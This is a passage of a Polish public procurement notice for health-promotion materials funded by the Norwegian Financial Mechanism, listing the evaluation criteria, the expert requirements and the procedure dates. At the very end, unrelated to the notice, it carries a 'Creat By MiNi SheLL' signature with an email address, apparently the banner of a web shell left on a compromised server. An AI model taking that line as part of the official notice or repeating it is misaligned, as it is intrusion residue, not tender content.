class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie ekspertów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1.Cena oferty brutto w PLN - C	30 pkt 2. Posiada wykształcenie medyczne i co najmniej stopieńnaukowy doktora habilitowanego – maksymalnie 10 pkt a)	Stopień naukowy doktora habilitowanego – 5 pkt b)	Tytuł naukowy profesora – 10 pkt 3. Posiada dodatkowe doświadczenie zawodowe (większe niż 2 lata) w pracy na stanowisku naukowym lub naukowo - dydaktycznym w uczelni wyższej lub instytucie prowadzącym działalność dydaktyczną – maksymalnie 10 pkt a)	3 lata doświadczenia – 5 pkt b)	4 lata doświadczenia – 6 pkt c)	5 lat doświadczenia – 7 pkt d)	6 lat doświadczenia – 8 pkt e)	7 lat doświadczenia – 9 pkt f)	8 lat doświadczenia i więcej – 10 pkt 4. Jest członkiem towarzystw naukowych (więcej niż 2) zajmujących się problematyką palenia tytoniu i chorób odtytoniowych – maksymalnie 15 pkt a)	3 towarzystw - 10 pkt b)	4 towarzystw -11 pkt c)	5 towarzystw - 12 pkt d)	6 towarzystw - 13 pkt e)	7 towarzystw - 14 pkt f)	8 towarzystw i więcej - 15 pkt 5. Posiada dodatkową udokumentowaną działalność naukową w zakresie palenia tytoniu tzn. jest autorem lub współautorem (więcej niż 5) publikacji poświęconych tej problematyce opublikowanych w ciągu ostatnich 5 lat – maksymalnie 10 pkt a)	6 publikacji - 6 pkt b)	7 publikacji - 7 pkt c)	8 publikacji - 8 pkt d)	9 publikacji - 9 pkt e)	10 publikacji i więcej- 10 pkt 6.Posiada dodatkową udokumentowaną działalność naukową w zakresie elektronicznych systemów dostarczających nikotynę oraz nowatorskich wyrobów tytoniowych tzn. jest autorem lub współautorem (więcej niż 5) publikacji poświęconych tej problematyce opublikowanych w ciągu ostatnich 5 lat – maksymalnie 15 pkt a)	6 publikacji - 11 pkt b)	7 publikacji - 12 pkt c)	8 publikacji - 13 pkt d)	9 publikacji - 14 pkt e)	10 publikacji i więcej - 15 pkt 7.Posiada dodatkowe udokumentowane doświadczenie w realizacji (więcej niż 2) projektów badawczych dotyczących palenia tytoniu, w tym międzynarodowych badań epidemiologicznych nad paleniem tytoniu – maksymalnie 5 pkt a)	3 projekty - 3 pkt b)	4 projekty - 4 pkt c)	5 projektów i więcej - 5 pkt 8.Posiada dodatkowe udokumentowane doświadczenie we współpracy międzynarodowej (udział w więcej niż 2 wydarzeniach) w zakresie projektowania polityki antytytoniowej (konferencje naukowe, staże, szkolenia) – maksymalnie 5 pkt a)	3 wydarzenia - 3 pkt b)	4 wydarzenia - 4 pkt c)	5 wydarzeń i więcej - 5 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przygotowanie i opracowanie materiałów promocyjnych w ramach projektu predefiniowanego nr 2 pn. „Zdrowy styl życia dzieci i młodzieży”, finansowanego z Norweskiego Mechanizmu Finansowego 2014-2021 w ramach programu pn. „ZDROWIE”:część III- Moduł nr 3 Zdrowie psychiczne - opracowanie materiałów promocyjnych i edukacyjnych na temat wspierania rodziców i nauczycieli w pomaganiu dzieciom z problemami w zdrowiu psychicznym, opracowanie materiałów na stronę internetową oraz materiałów szkoleniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79341400-0 - Usługi prowadzenia kampanii reklamowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena oferty brutto w PLN - C	30 pkt 2. Posiada co najmniej tytuł naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia - maksymalnie 20 pkt a)	Stopień naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia –10 pkt b)	Tytuł naukowy profesora w dziedzinie psychiatrii- 20 pkt 3. Posiada dodatkowe doświadczenie zawodowe (większe niż 3 lata) w pracy z dziećmi i młodzieżą w wieku szkolnym (szkoła podstawowa lub szkoły ponadpodstawowe) z problemami/ zaburzeniami psychicznymi - maksymalnie 20pkt a)	4 lata doświadczenia – 15 pkt b)	5 lat doświadczenia – 16 pkt c)	6 lat doświadczenia – 17 pkt d)	7 lat doświadczenia – 18 pkt e)	8 lat doświadczenia –19 pkt f)	9 lat doświadczenia i więcej - 20 pkt 4.Posiada dodatkowe doświadczenie (brał/bierze udział w więcej niż 30 godzinach) w organizacji warsztatów dla rodziców lub nauczycieli lub opiekunów w dziedzinie zdrowia psychicznego dzieci i młodzieży - maksymalnie 15 pkt a) 40 godzin warsztatów – 10 pkt b)	50 godzin warsztatów i więcej – 15 pkt 5. Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem więcej niż 3 publikacji lub artykułów poświęconych problematyce zaburzeń psychicznych dzieci i młodzieży - maksymalnie 10 pkt a)	4 publikacje/artykuły - 5 pkt b)	5 publikacji/artykułów - 6 pkt c)	6 publikacji/artykułów - 7 pkt d)	7 publikacji/artykułów - 8 pkt e)	8 publikacji/artykułów – 9 pkt f)	9 publikacji/artykułów i więcej- 10 pkt 6. Posiada znajomość języka angielskiego na poziomie powyżej B2 – max 5 pkt a)	Tak – 5 pkt b)	Nie – 0 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie ekpertów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Cena oferty brutto w PLN - C	30 pkt 2. Posiada co najmniej tytuł naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia - maksymalnie 20 pkt a)	Stopień naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia –10 pkt b)	Tytuł naukowy profesora w dziedzinie psychiatrii- 20 pkt 3. Posiada dodatkowe doświadczenie zawodowe (większe niż 3 lata) w pracy z dziećmi i młodzieżą w wieku szkolnym (szkoła podstawowa lub szkoły ponadpodstawowe) z problemami/ zaburzeniami psychicznymi - maksymalnie 20pkt a)	4 lata doświadczenia – 15 pkt b)	5 lat doświadczenia – 16 pkt c)	6 lat doświadczenia – 17 pkt d)	7 lat doświadczenia – 18 pkt e)	8 lat doświadczenia –19 pkt f)	9 lat doświadczenia i więcej - 20 pkt 4.Posiada dodatkowe doświadczenie (brał/bierze udział w więcej niż 30 godzinach) w organizacji warsztatów dla rodziców lub nauczycieli lub opiekunów w dziedzinie zdrowia psychicznego dzieci i młodzieży - maksymalnie 15 pkt a) 40 godzin warsztatów – 10 pkt b)	50 godzin warsztatów i więcej – 15 pkt 5. Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem więcej niż 3 publikacji lub artykułów poświęconych problematyce zaburzeń psychicznych dzieci i młodzieży - maksymalnie 10 pkt a)	4 publikacje/artykuły - 5 pkt b)	5 publikacji/artykułów - 6 pkt c)	6 publikacji/artykułów - 7 pkt d)	7 publikacji/artykułów - 8 pkt e)	8 publikacji/artykułów – 9 pkt f)	9 publikacji/artykułów i więcej- 10 pkt 6. Posiada znajomość języka angielskiego na poziomie powyżej B2 – max 5 pkt a)	Tak – 5 pkt b)	Nie – 0 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, gdy Wykonawca dysponuje osobami wyznaczonymi do realizacji zamówienia spełniającymi warunki:Część I A.	ekspert zaangażowany do przygotowania i oceny programu szkoleniowego, dotyczącego zdrowych opcji w przedszkolach i żłobkach - 1 osoba:a)	posiada co najmniej tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu;b)	posiada co najmniej 5 letnie doświadczenie zawodowe w obszarze prawidłowego żywienia;c)	posiada doświadczenie (brał/bierze udział) w organizacji co najmniej 30 godzin warsztatów dla dzieci w zakresie zdrowego żywienia;d)	posiada udokumentowane doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem co najmniej 3 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach;e)	posiada znajomość języka angielskiego na poziomie minimum B2 (ekspert powinien znać język angielski w stopniu zapewniającym prawidłową komunikację w języku angielskim w obszarze merytorycznym zamówienia).B.	ekspert zaangażowany do opracowania treści materiałów edukacyjnych i promocyjnych - 1 osoba:a)	posiada co najmniej tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu;b)	posiada co najmniej 5 letnie doświadczenie zawodowe w obszarze prawidłowego żywienia;c)	posiada doświadczenie (brał/bierze udział) w organizacji co najmniej 30 godzin warsztatów dla dzieci w zakresie zdrowego żywienia;d)	posiada udokumentowane doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem co najmniej 3 publikacji lub artykułów poświęconych problematyce zdrowego żywienia dzieci w żłobkach i przedszkolach;e)	posiada znajomość języka angielskiego na poziomie minimum B2 (ekspert powinien znać język angielski w stopniu zapewniającym prawidłową komunikację w języku angielskim w obszarze merytorycznym zamówienia).Część IIEkspert odpowiedzialny za analizę i opracowanie materiałów promocyjnych i edukacyjnych skierowanych do młodzieży na temat zdrowego stylu życia i zapobiegania nadużywaniu substancji tytoniowych - 1 osoba:a)	posiada wykształcenie medyczne i co najmniej stopień naukowy doktora;b)	posiada co najmniej 2-letnie doświadczenie zawodowe w pracy na stanowisku naukowym lub naukowo - dydaktycznym w uczelni wyższej lub instytucie prowadzącym działalność dydaktyczną;c)	jest członkiem minimum 2 towarzystw naukowych zajmujących się problematyką palenia tytoniu i chorób odtytoniowych;d)	posiada udokumentowaną działalność naukową w zakresie palenia tytoniu tzn. jest autorem lub współautorem co najmniej 5 publikacji poświęconych tej problematyce opublikowanych w ciągu ostatnich 5 lat;e)	posiada udokumentowaną działalność naukową w zakresie elektronicznych systemów dostarczających nikotynę oraz nowatorskich wyrobów tytoniowych tzn. jest autorem lub współautorem co najmniej 5 publikacji poświęconych tej problematyce opublikowanych w ciągu ostatnich 5 lat;f)	posiada udokumentowane doświadczenie w realizacji co najmniej 2 projektów badawczych dotyczących palenia tytoniu, w tym międzynarodowych badań epidemiologicznych nad paleniem tytoniu;g)	posiada udokumentowane doświadczenie we współpracy międzynarodowej w zakresie projektowania polityki antytytoniowej – udział w co najmniej 2 wydarzeniach (konferencje naukowe, staże, szkolenia).Część III Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych dotyczących zdrowia psychicznego dzieci i młodzieży- 1 osoba:a)	posiada co najmniej tytuł magistra psychologii lub ukończone studia na kierunku lekarskim wraz z ukończoną specjalizacją z psychiatrii lub psychiatrii dzieci i młodzieży, b)	posiada co najmniej 3-letnie doświadczenie zawodowe w pracy z dziećmi i młodzieżą w wieku szkolnym (szkoła podstawowa lub szkoły ponadpodstawowe) z problemami/ zaburzeniami psychicznymi;c)	posiada doświadczenie (brał/bierze udział) w organizacji co najmniej 30 godzin warsztatów dla rodziców lub nauczycieli lub opiekunów w dziedzinie zdrowia psychicznego dzieci i młodzieży,d)	posiada doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem co najmniej 3 publikacji lub artykułów poświęconych problematyce zaburzeń psychicznych dzieci i młodzieży,e)	posiada znajomość języka angielskiego co najmniej na poziomie B2 (ekspert powinien znać język angielski w stopniu zapewniającym prawidłową komunikację w języku angielskim w obszarze merytorycznym zamówienia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; 2)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 Ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; 3)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;4)	Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 Ustawy PZP, przedstawienia podmiotowych środków dowodowych;5)	Zamawiający żąda od wykonawcy przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 2 ust. 3-5 SWZ dotyczących podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach określonych w art. 118 Ustawy PZP potwierdzających, że nie zachodzą wobec tych podwykonawców podstawy wykluczenia z postępowania.6)Dokumenty podmiotów zagranicznych: jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast zaświadczenia, o którym mowa pkt 2.3, zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o których mowa w pkt 2.4 lub odpisu albo informacji z Krajowego Rejestru Sądowego o których mowa w pkt 2.5 SWZ składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem, 7)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 Ustawy PZP, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;2)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 4 do SWZ);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty wspólnej należy do oferty załączyć dokument ustanawiający pełnomocnika do reprezentowania wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego – wymagania dotyczące podpisania dokumentu elektronicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 1)	przedłużenia terminów wykonania przedmiotu umowy (w zakresie któregokolwiek z jego elementów, wskazanych w § 1 ust. 2 pkt od 1 do 6), określonych odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub pkt 5 w przypadku: a)	wystąpienia okoliczności, trudnych do przewidzenia w chwili zawarcia umowy, a które uniemożliwiają wykonanie przedmiotu umowy w terminach określonych odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub pkt 5 i które są niezawinione przez Wykonawcę, w tym w szczególności okoliczności powstających na skutek zdarzeń losowych, siły wyższej lub zagrożenia epidemicznego, których skutki mają przełożenie na terminową realizację przedmiotu umowy, b)	wystąpienia opóźnień po stronie Zamawiającego (w tym po stronie Partnera z Królestwa Norwegii), które uniemożliwiają Wykonawcy realizację przedmiotu umowy w terminie, określonym odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub pkt 5,- odpowiednio do zaistniałych okoliczności lub opóźnień po stronie Zamawiającego, ale nie więcej niż o 33% danego terminu (obliczonego w tygodniach, zaczynając od dnia zawarcia umowy, a kończąc na ostatnim dniu ostatniego tygodnia wskazanego odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub wskazanego datą kalendarzową w pkt 5), zaokrąglając do pełnego tygodnia w górę;2) zaistnienia obowiązku wykonania uzupełnień, konsultacji, poprawek, doprecyzowania lub usprawnień przedmiotu umowy, przy czym zmiana może dotyczyć zakresu wykonywanej usługi w stopniu nie wykraczającym poza zakres przedmiotu umowy zawarty w OPZ;3) zmiany wynikającej z omyłki pisarskiej, rachunkowej, lub innej oczywistej omyłki, poprzez poprawienie zaistniałych omyłek;4) powstania rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w umowie lub OPZ w celu jednoznacznego rozumienia zapisów, których nie będzie można usunąć w inny sposób, a zmiana których będzie umożliwiać usunięcie tych rozbieżności;5) zmiany formy organizacyjno – prawnej, przekształcenia lub połączenia z inną firmą po stronie Wykonawcy lub zmiany nazwy Wykonawcy lub w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania Wytycznych w zakresie udzielania zamówień w ramach Mechanizmu Finansowego EOG na lata 2014-2021 oraz Norweskiego Mechanizmu Finansowego na lata 2014-2021;6) określonym w art. 455 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (poz. 2019, z późn. zm.). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-30 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-04-29</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com